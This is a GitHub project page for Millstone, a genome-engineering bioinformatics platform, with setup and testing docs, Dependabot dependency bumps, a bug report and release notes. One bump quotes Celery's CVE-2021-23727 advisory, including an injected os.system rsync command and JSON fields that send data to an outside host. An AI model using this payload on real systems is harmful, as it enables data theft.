Millstone is a distributed bioinformatics software platform designed to facilitate genome engineering for synthetic biology. It automates iterative design, analysis, and debugging for projects involving hundreds of microbial genomes.
The easiest way to use Millstone is directly on Amazon Web Services (AWS) using our pre-built AMI. Instructions here.
Docs, demo and installation information is available here: http://churchlab.github.io/millstone/index.html. Developer instructions are below.
The following is intended for developers. Most users will want to use Millstone directly on AWS as described here.
These are directions for installing Millstone on your own machine, meant for advanced users who want a custom installation. If you want to deploy a pre-configured Millstone instance to the cloud, read Getting Started with Millstone on the wiki.
Before continuing, make sure all above dependencies are installed. On Mac, we prefer Homebrew for package management, and use it in the instructions below.
Before installing, you must install git and clone the latest version of Millstone from GitHub. GitHub has information on setting up git. Once git is installed, you can clone the repository with:
$ git clone https://github.com/churchlab/millstone.git <millstone_installation dir>
$ cd <millstone_installation dir>
We recommend using virtualenv for creating and managing a sandboxed Python environment. This makes it easy to stay up to date with requirements, which are listed in requirements.txt. Follow the instructions below to set up your virtualenv and install the required packages.
Install virtualenv if you don't have it yet. (You may want to install pip first.)
Create a new virtual environment for this project. This virtual environment isn't part of the project, so just put it somewhere on your machine. I keep all of my virtual environments in the directory ~/pyenvs/.
$ virtualenv ~/pyenvs/genome-designer-env
If you want to use a version of python different from the OS default you can specify the python binary with the '-p' option:
$ virtualenv -p /usr/local/bin/python2.7 ~/pyenvs/genome-designer-env
Activate the environment in the shell. This will use the python and other binaries like pip that are located in your pyenv. You should do this whenever running any Python/Django scripts.
$ source ~/pyenvs/genome-designer-env/bin/activate
Install the dependencies in your virtual environment. We follow the convention of using pip freeze to write a .txt file containing the list of requirements.
Most users will want to do:
$ pip install -r requirements/deploy.txt
If you plan on editing the code, you should run:
$ pip install -r requirements/dev.txt
In practice, however, this doesn't always work perfectly; in particular, it may be necessary to install specific packages first.
NOTE: Watch for changes to requirements.txt and re-run the install command when collaborators add new dependencies.
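A quick way to spot what changed is to diff the pinned requirements. The following is a toy sketch (not part of Millstone; the pins shown are hypothetical) that reports pins present in the new file but not the old one:

```python
def new_requirements(old_lines, new_lines):
    """Return pins present in new_lines but not old_lines.

    Toy illustration: a quick way to see what collaborators added
    when requirements.txt changes. Ignores blank lines and comments.
    """
    old = {line.strip() for line in old_lines
           if line.strip() and not line.strip().startswith('#')}
    return [line.strip() for line in new_lines
            if line.strip() and not line.strip().startswith('#')
            and line.strip() not in old]

print(new_requirements(['celery==3.1.17'],
                       ['celery==3.1.17', 'django-celery==3.1.16']))
# -> ['django-celery==3.1.16']
```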
We currently submodule jbrowse, and perhaps will do so with other tools in the future. Specifically, we have submoduled a forked copy of jbrowse at a specific commit. To check out the appropriate submodule states, run:
$ git submodule update --init --recursive
This will pull the submodules and also pull any of their submodules.
After installing JBrowse via the Git submodule route described above, you need to do the following to get JBrowse up and running:
NOTE: Only step 1 is necessary to get the tests to pass. The later steps need to be updated.
Run the JBrowse setup script inside the jbrowse dir:
$ cd jbrowse
$ ./setup.sh
$ cd ..
Install nginx if it's not already installed, and copy or symlink the config file into nginx's sites-enabled dir.
NOTE: On Mac, the sites-enabled dir is not present in the nginx version installed with brew, so the directory has to be created and included in nginx.conf (the Mac commands below do both).
Unix:
$ sed -i.orig "s:/path/to/millstone:$(pwd):g" config/jbrowse.local.nginx
$ sudo ln -s `pwd`/config/jbrowse.local.nginx /etc/nginx/sites-enabled
Mac (run these commands from the project root):
$ sed -i.orig "s:/path/to/millstone:$(pwd):g" config/jbrowse.local.nginx
$ perl -pi.orig -e '$_ .= " include /usr/local/etc/nginx/sites-enabled/*;\n" if /^http/' /usr/local/etc/nginx/nginx.conf
$ sudo mkdir -p /usr/local/etc/nginx/sites-enabled
$ sudo ln -s `pwd`/config/jbrowse.local.nginx /usr/local/etc/nginx/sites-enabled/millstone
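The perl one-liner above appends an include directive right after the line that opens the http block in nginx.conf. A pure-Python rendering of the same edit (illustrative only; the real edit is done in-place by perl -pi):

```python
import re


def add_sites_enabled_include(conf_text):
    """Mimic the perl one-liner: after any line starting with 'http',
    insert an include directive for the sites-enabled directory."""
    out = []
    for line in conf_text.splitlines(True):
        out.append(line)
        if re.match(r'^http', line):
            out.append(' include /usr/local/etc/nginx/sites-enabled/*;\n')
    return ''.join(out)


print(add_sites_enabled_include('events {\n}\nhttp {\n    server {}\n}\n'))
```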
Unix:
$ sudo service nginx restart
Mac:
$ ln -sfv /usr/local/opt/nginx/*.plist ~/Library/LaunchAgents
$ launchctl load ~/Library/LaunchAgents/homebrew.mxcl.nginx.plist
$ # to reload: sudo nginx -s reload
Install the Perl local::lib module from CPAN for JBrowse:
$ sudo cpan install local::lib
Check that JBrowse is working locally by visiting:
http://localhost/jbrowse/index.html?data=sample_data/json/volvox
NOTE: If, upon running the Millstone application or its tests, you observe errors related to missing Perl modules, you should also install them with cpan.
NOTE: Tests should pass without RabbitMQ set up, so it's okay to skip this at first.
Asynchronous processing is necessary for many of the analysis tasks in this application. We use the open-source project celery, since it is actively developed and has a library for integrating with Django. Celery requires a message broker; we use RabbitMQ, which is Celery's default.
Install Celery
The celery and django-celery packages are listed in requirements.txt and should be installed in your virtualenv following the instructions above.
Install RabbitMQ - On Ubuntu, install using sudo:
$ sudo apt-get install rabbitmq-server
Full instructions are here.
On Mac, homebrew can be used:
$ brew install rabbitmq
After install, you can run the server with:
$ sudo /usr/local/sbin/rabbitmq-server
Further Mac instructions are here.
The following installs various third-party bioinformatics tools and sets up JBrowse.
$ cd genome_designer
$ ./millstone_setup.py
NOTE: If you make local changes, be sure to put them in a file called genome_designer/conf/local_settings.py. You should not modify global_settings.py.
(Mac Only) If you are using a fresh Postgres install, you may need to initialize the database:
$ initdb /usr/local/var/postgres -E utf8
$ pg_ctl -D /usr/local/var/postgres -l logfile start
$ # On OS X 10.10 after installing with brew, it was also necessary to run:
$ createdb
(Mac Only) Since most new Postgres Mac installations (both via brew and Postgres.app) do not have a postgres admin user, you will need to modify the DATABASES variable in genome_designer/conf/local_settings.py.
Navigate to the genome_designer/ dir.
Bootstrapping the database will automatically add the user, db, and permissions:
$ python scripts/bootstrap_data.py -q
We have two kinds of tests: unit and integration. Unit tests are intended to be more specific tests of smaller pieces of the code, while integration tests attempt to connect multiple pieces. The integration tests actually start celery worker instances to simulate what happens in an async environment, while our unit tests use CELERY_ALWAYS_EAGER = True to mock out celery.
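The eager-execution idea can be illustrated without Celery itself. A toy sketch (names hypothetical, not Millstone or Celery code) of what CELERY_ALWAYS_EAGER changes:

```python
# Toy illustration of eager execution: when eager, "asynchronous" tasks run
# synchronously in the caller's process, so unit tests never need a real
# broker or worker.
ALWAYS_EAGER = True  # analogous to CELERY_ALWAYS_EAGER in the test settings


class EagerResult(object):
    """Stand-in for an async result whose value is already computed."""
    def __init__(self, value):
        self._value = value

    def get(self):
        return self._value


def delay(func, *args, **kwargs):
    """Stand-in for task.delay(): runs inline when ALWAYS_EAGER is set."""
    if ALWAYS_EAGER:
        return EagerResult(func(*args, **kwargs))
    raise NotImplementedError('a real broker would enqueue the task here')


def double_coverage(n):  # hypothetical task
    return n * 2


print(delay(double_coverage, 21).get())  # -> 42
```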
We currently use django-nose for running tests, which provides a better interface than Django's native testing setup (although this might not be true with the latest Django).
To run unit tests:
(venv)$ ./scripts/run_unit_tests.sh
To run integration tests:
(venv)$ ./scripts/run_integration_tests.sh
Nose also allows us to run tests only in specific modules. To run only the tests in, say, the main app directory, run:
(venv)$ ./scripts/run_unit_tests.sh main
For integration tests, we haven't figured out the optimal syntax in the test script, so to run individual tests you'll need this more explicit form:
(venv)$ ./manage.py test --settings=tests.integration_test_settings tests/integration/test_pipeline_integration.py:TestAlignmentPipeline.test_run_pipeline
The same form works for unit tests; just use --settings=tests.test_settings.
Note: the following examples use a bare manage.py test invocation for brevity, but you should adhere to the script-based examples above.
To run a single test module, run:
(venv)$ python manage.py test main.tests.test_models
To run a single test case, e.g.:
(venv)$ python manage.py test scripts/tests/test_alignment_pipeline.py:TestAlignmentPipeline.test_create_alignment_groups_and_start_alignments
To reuse the Postgresql database, wiping it rather than destroying and creating each time, use:
(venv)$ REUSE_DB=1 ./manage.py test
Note that for some reason integration tests currently fail if run with the form:
(venv)$ REUSE_DB=0 ./scripts/run_integration_tests.sh
Make sure you have R and unafold installed to avoid errors.
We recently introduced the concept of integration tests to our code. Previously, many of our unit tests outgrew their unit-ness, but we were still treating them as unit tests.
We created an IntegrationTestSuiteRunner; the main difference is that it starts up a celery server that handles processing tasks. We are migrating tests that are really integration tests to be covered under this label.
When adding a test (see below), if your test touches multiple code units, it's likely more appropriate to put it under integration test coverage. We'll add notes shortly about how to add new integration tests.
To run integration tests, use this command. This uses nose so you can use the same options and features as before.
(venv)$ ./scripts/run_integration_tests.sh
HINT: When debugging integration tests, it may be necessary to manually clean up previously started celerytestworkers. There is a script to do this for you:
$ ./scripts/kill_celerytestworkers.sh
Our test framework isn't perfect. Here are some potential problems and other hints that might help.
You might see this error:
AssertionError: No running Celery workers were found.
So far, we're aware of a couple reasons you might see this:
ps aux and grep are your friends. To see running celery processes:
ps aux | grep celery
To see running integration test:
ps aux | grep python.*integration
To kill the process associated with the integration test (e.g., PID 777):
kill 777
To kill orphaned celerytestworker processes, we actually have a script:
./scripts/kill_celerytestworkers.sh
This command runs a specific integration test and doesn't capture stdout:
./manage.py test -s --settings=tests.integration_test_settings tests/integration/test_pipeline_integration.py:TestAlignmentPipeline.test_run_pipeline
(Right now, this documentation is only for unit tests. Information for integration tests is coming soon.)
Nose automatically discovers files with names of the form test_*.py as test files.
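The file-matching convention can be sketched with the stdlib's fnmatch (illustrative only; nose's actual matching is configurable and slightly broader):

```python
import fnmatch


def is_test_file(filename):
    """Sketch of the discovery convention above: files named test_*.py
    are collected as test files; everything else is skipped."""
    return fnmatch.fnmatch(filename, 'test_*.py')


print([f for f in ['test_models.py', 'models.py', 'test_views.py', 'tests.txt']
       if is_test_file(f)])  # -> ['test_models.py', 'test_views.py']
```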
Activate your virtualenv, e.g.:
$ source ~/pyenvs/genome-designer-env/bin/activate
Navigate to the genome_designer/ dir.
From one terminal, start the celery server.
(venv)$ ./scripts/run_celery.sh
Open another terminal and start the django server.
(venv)$ python manage.py runserver
Visit the url http://localhost:8000/ to see the demo.
First make sure Celery is running. In another terminal do:
(venv)$ ./scripts/run_celery.sh
From the genome_designer directory, run:
(venv)$ python scripts/bootstrap_data.py full
NOTE: This will delete the entire dev database and re-create it with only the hard-coded test models. The username and password for this test database are at the top of scripts/bootstrap_data.py.
Right now we use logging for just-in-time debugging. Eventually, it would be nice to have logging for more robust debugging.
Add the following lines in the file you want to log from. We use the logger debug_logger, which is already configured in global_settings.py.
import logging
LOGGER = logging.getLogger('debug_logger')
Then, to log something (instead of using print statements), do:
LOGGER.debug('string or variable you want to log')
By default, logs are written to genome_designer/default.log, as specified in global_settings.py.
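As a standalone sketch of how a file-backed debug_logger could be wired up (in Millstone the equivalent configuration lives in global_settings.py via Django's LOGGING dict; the path below is a stand-in, not the real one):

```python
import logging
import os
import tempfile

# Stand-in path; Millstone's real log path is genome_designer/default.log,
# configured in global_settings.py.
log_path = os.path.join(tempfile.gettempdir(), 'default.log')

logger = logging.getLogger('debug_logger')
logger.setLevel(logging.DEBUG)
handler = logging.FileHandler(log_path, mode='w')
handler.setFormatter(
    logging.Formatter('%(asctime)s %(levelname)s %(message)s'))
logger.addHandler(handler)

# Log a message instead of printing it.
logger.debug('alignment group created')
handler.flush()
```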
On Ubuntu, if your database is called gdv2db:
sudo -u postgres psql gdv2db
To debug tests with pdb, add pdb.set_trace() checkpoints and use a command similar to:
REUSE_DB=1 ./manage.py test -s --pdb --pdb-failures main/tests/test_xhr_handlers.py:TestGetVariantList.test__basic_function
The debug.profiler module contains a profile decorator that can be added to a function. For example, to debug a view:
PROFILE_LOG_BASE = '/path/to/logs'
Make sure this directory exists before proceeding.
Import the profile decorator and add @profile('log_file_name') in front of the method you want to profile, e.g.:
from debug.profiler import profile
...
@profile('mylog.log')
def my_view(request):
    ...
Use the debug/inspect_profiler_data.py convenience script to parse the data, e.g.:
python inspect_profiler_data.py /path/to/log/mylog
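A hypothetical sketch in the spirit of debug.profiler.profile (the real implementation may differ): run the function under cProfile and dump the stats to a file under PROFILE_LOG_BASE.

```python
import cProfile
import functools
import os
import tempfile

PROFILE_LOG_BASE = tempfile.gettempdir()  # stand-in for the real setting


def profile(log_name):
    """Decorator sketch: profile the wrapped function with cProfile and
    dump stats to PROFILE_LOG_BASE/log_name, returning the real result."""
    def decorator(func):
        @functools.wraps(func)
        def wrapper(*args, **kwargs):
            prof = cProfile.Profile()
            result = prof.runcall(func, *args, **kwargs)
            prof.dump_stats(os.path.join(PROFILE_LOG_BASE, log_name))
            return result
        return wrapper
    return decorator


@profile('mylog.log')
def my_view():  # hypothetical view; the real decorator targets Django views
    return sum(range(1000))


print(my_view())  # -> 499500
```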
Millstone development is generously supported by AWS Cloud Credits for Research.
Bumps numpy from 1.8.1 to 1.22.0.
Sourced from numpy's releases.
v1.22.0
NumPy 1.22.0 Release Notes
NumPy 1.22.0 is a big release featuring the work of 153 contributors spread over 609 pull requests. There have been many improvements, highlights are:
- Annotations of the main namespace are essentially complete. Upstream is a moving target, so there will likely be further improvements, but the major work is done. This is probably the most user visible enhancement in this release.
- A preliminary version of the proposed Array-API is provided. This is a step in creating a standard collection of functions that can be used across applications such as CuPy and JAX.
- NumPy now has a DLPack backend. DLPack provides a common interchange format for array (tensor) data.
- New methods for quantile, percentile, and related functions. The new methods provide a complete set of the methods commonly found in the literature.
- A new configurable allocator for use by downstream projects.
These are in addition to the ongoing work to provide SIMD support for commonly used functions, improvements to F2PY, and better documentation.
The Python versions supported in this release are 3.8-3.10, Python 3.7 has been dropped. Note that 32 bit wheels are only provided for Python 3.8 and 3.9 on Windows, all other wheels are 64 bits on account of Ubuntu, Fedora, and other Linux distributions dropping 32 bit support. All 64 bit wheels are also linked with 64 bit integer OpenBLAS, which should fix the occasional problems encountered by folks using truly huge arrays.
Expired deprecations
Deprecated numeric style dtype strings have been removed
Using the strings "Bytes0", "Datetime64", "Str0", "Uint32", and "Uint64" as a dtype will now raise a TypeError. (gh-19539)
Expired deprecations for loads, ndfromtxt, and mafromtxt in npyio
numpy.loads was deprecated in v1.15, with the recommendation that users use pickle.loads instead. ndfromtxt and mafromtxt were both deprecated in v1.17 - users should use numpy.genfromtxt instead with the appropriate value for the usemask parameter. (gh-19615)
... (truncated)
4adc87d Merge pull request #20685 from charris/prepare-for-1.22.0-release
fd66547 REL: Prepare for the NumPy 1.22.0 release.
125304b wip
c283859 Merge pull request #20682 from charris/backport-20416
5399c03 Merge pull request #20681 from charris/backport-20954
f9c45f8 Merge pull request #20680 from charris/backport-20663
794b36f Update armccompiler.py
d93b14e Update test_public_api.py
7662c07 Update init.py
311ab52 Update armccompiler.py
Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.
After uploading the FASTQ file and reference genome (.gnk), I submitted the alignment job. It then shows ERROR, and when I open the 'bwa_align.error' file I see the following error. I'm not sure what's going on and hope to get your answer.
The input is probably truncated.
Killed
Segmentation fault (core dumped)
Traceback (most recent call last):
  File "/home/ubuntu/millstone/genome_designer/pipeline/read_alignment.py", line 156, in align_with_bwa_mem
    opt_processing_mask=opt_processing_mask)
  File "/home/ubuntu/millstone/genome_designer/pipeline/read_alignment.py", line 278, in process_sam_bam_file
    subprocess.check_call(sort_rmdup_cmd, shell=True, stderr=error_output)
  File "/usr/lib/python2.7/subprocess.py", line 540, in check_call
    raise CalledProcessError(retcode, cmd)
CalledProcessError: Command '/home/ubuntu/millstone/genome_designer/conf/../tools/samtools/samtools sort -o /home/ubuntu/millstone/genome_designer/conf/../temp_data/projects/197f3ad5/alignment_groups/a706a96f/sample_alignments/72eb1c40/bwa_align.bam /home/ubuntu/millstone/genome_designer/conf/../temp_data/projects/197f3ad5/alignment_groups/a706a96f/sample_alignments/72eb1c40/bwa_align.sorted.tmp.bam|/home/ubuntu/millstone/genome_designer/conf/../tools/samtools/samtools rmdup - /home/ubuntu/millstone/genome_designer/conf/../temp_data/projects/197f3ad5/alignment_groups/a706a96f/sample_alignments/72eb1c40/bwa_align.sorted.bam' returned non-zero exit status 139
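For context on how this error surfaces: exit status 139 is 128 + 11, meaning the shell reports the process was killed by signal 11 (SIGSEGV), consistent with the "Segmentation fault" and "input is probably truncated" lines, and subprocess.check_call raises CalledProcessError for any non-zero exit status. A minimal illustration of that mechanism:

```python
import subprocess

# check_call raises CalledProcessError whenever the shell command exits
# non-zero. Status 139 = 128 + 11, i.e. killed by SIGSEGV; in the traceback
# above it is the samtools pipeline that crashed, not Python itself.
try:
    subprocess.check_call('exit 139', shell=True)
except subprocess.CalledProcessError as e:
    print(e.returncode)  # -> 139
```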
Bumps ipython from 0.13.2 to 7.16.3.
Sourced from ipython's releases.
7.9.0
No release notes provided.
7.8.0
No release notes provided.
7.7.0
No release notes provided.
7.6.1
No release notes provided.
7.6.0
No release notes provided.
7.5.0
No release notes provided.
7.4.0
No release notes provided.
7.3.0
No release notes provided.
7.2.0
No release notes provided.
7.1.1
No release notes provided.
7.1.0
No release notes provided.
7.0.1
No release notes provided.
7.0.0
No release notes provided.
7.0.0-doc
No release notes provided.
7.0.0rc1
No release notes provided.
7.0.0b1
No release notes provided.
6.2.1
No release notes provided.
... (truncated)
d43c7c7 release 7.16.3
5fa1e40 Merge pull request from GHSA-pq7m-3gw7-gq5x
8df8971 back to dev
9f477b7 release 7.16.2
138f266 bring back release helper from master branch
5aa3634 Merge pull request #13341 from meeseeksmachine/auto-backport-of-pr-13335-on-7...
bcae8e0 Backport PR #13335: What's new 7.16.2
8fcdcd3 Pin Jedi to <0.17.2.
2486838 release 7.16.1
20bdc6f fix conda build
Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.
Bumps celery from 3.1.17 to 5.2.2.
Sourced from celery's releases.
5.2.2
Release date: 2021-12-26 16:30 P.M UTC+2:00
Release by: Omer Katz
Various documentation fixes.
Fix CVE-2021-23727 (Stored Command Injection security vulnerability).
When a task fails, the failure information is serialized in the backend. In some cases, the exception class is only importable from the consumer's code base. In this case, we reconstruct the exception class so that we can re-raise the error on the process which queried the task's result. This was introduced in #4836. If the recreated exception type isn't an exception, this is a security issue. Without the condition included in this patch, an attacker could inject a remote code execution instruction such as:
os.system("rsync /data [email protected]:~/data")
by setting the task's result to a failure in the result backend, with os as the exception module, system as the exception type, and the payload rsync /data [email protected]:~/data as the exception arguments, like so:
{ "exc_module": "os", "exc_type": "system", "exc_message": "rsync /data [email protected]:~/data" }
According to my analysis, this vulnerability can only be exploited if the producer delayed a task which runs long enough for the attacker to change the result mid-flight, and the producer has polled for the task's result. The attacker would also have to gain access to the result backend. The severity of this security vulnerability is low, but we still recommend upgrading.
v5.2.1
Release date: 2021-11-16 8.55 P.M UTC+6:00
Release by: Asif Saif Uddin
- Fix rstrip usage on bytes instance in ProxyLogger.
- Pass logfile to ExecStop in celery.service example systemd file.
- fix: reduce latency of AsyncResult.get under gevent (#7052)
- Limit redis version: <4.0.0.
- Bump min kombu version to 5.2.2.
- Change pytz>dev to a PEP 440 compliant pytz>0.dev.0.
... (truncated)
b21c13d Bump version: 5.2.1 → 5.2.2
a60b486 Add changelog for 5.2.2.
3e5d630 Fix changelog formatting.
1f7ad7e Fix CVE-2021-23727 (Stored Command Injection securtiy vulnerability).
2d8dbc2 Update configuration.rst
9596aba Fix typo in documentation
639ad83 update doc to reflect Celery 5.2.x (#7153)
d32356c Bump version: 5.2.0 → 5.2.1
6842a78 Merge branch 'master' of https://github.com/celery/celery
4c92cb7 changelog for v5.2.1
Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.
Bumps django from 1.5.1 to 2.2.24.
2da029d [2.2.x] Bumped version for 2.2.24 release.
f27c38a [2.2.x] Fixed CVE-2021-33571 -- Prevented leading zeros in IPv4 addresses.
053cc95 [2.2.x] Fixed CVE-2021-33203 -- Fixed potential path-traversal via admindocs'...
6229d87 [2.2.x] Confirmed release date for Django 2.2.24.
f163ad5 [2.2.x] Added stub release notes and date for Django 2.2.24.
bed1755 [2.2.x] Changed IRC references to Libera.Chat.
63f0d7a [2.2.x] Refs #32718 -- Fixed file_storage.test_generate_filename and model_fi...
5fe4970 [2.2.x] Post-release version bump.
61f814f [2.2.x] Bumped version for 2.2.23 release.
b8ecb06 [2.2.x] Fixed #32718 -- Relaxed file name validation in FileField.
Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.
Bumps django-registration from 1.0 to 3.1.2.
2db0bb7 Merge pull request from GHSA-58c7-px5v-82hh
f314570 Bump version numbers for 3.1.2.
41460db Add CVE number to release notes.
d68ec81 Add release notes for security advisory.
8206af0 Filter sensitive POST parameters in error reports
8e5a695 Merge pull request #224 from quroom/ko-translation
e60d468 Update korean translation
5666558 Merge pull request #221 from TomasLoow/master
25a668e Fix up basepython for local runs.
8298d82 And do it properly.
Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.
Publication: https://genomebiology.biomedcentral.com/articles/10.1186/s13059-017-1223-1
Latest AWS AMI was built just prior to this release and has been tested extensively: millstone_combined_2016_11_14_b7ec4874299de63377eb80e43b7fdc1e5cc4e558
An AMI with the dependency updates made for this release is being tested.
This is the first release of Millstone used in the initial Amazon AMI that we cut. This release includes the full end-to-end user flow, including alignment and SNV-calling using Freebayes.
One notable piece of functionality that we've disabled in this release until further testing is SV calling.